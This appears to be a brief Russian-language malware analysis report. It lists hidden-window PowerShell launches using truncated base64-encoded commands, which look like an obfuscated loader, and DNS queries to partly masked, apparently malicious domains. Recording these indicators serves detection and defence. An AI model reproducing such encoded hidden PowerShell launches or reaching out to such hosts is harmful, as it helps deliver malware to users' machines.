Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABEAHoAYQBtAHcAbgBuAHkAZgBzAD0AJwBJAHgAegBlAG8AcAB4AHIAcgBrAGsAdAAnADsAJABKAHYAcQBlAGEAagBpAGkAagAgAD...
- DNS ASK ay##ya.com
- DNS ASK 10##a.com
- DNS ASK wn##isa.com
- DNS ASK as######nkersegurukulam.com
- DNS ASK ji###shplan.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABEAHoAYQBtAHcAbgBuAHkAZgBzAD0AJwBJAHgAegBlAG8AcAB4AHIAcgBrAGsAdAAnADsAJABKAHYAcQBlAGEAagBpAGkAagAgAD...' (со скрытым окном)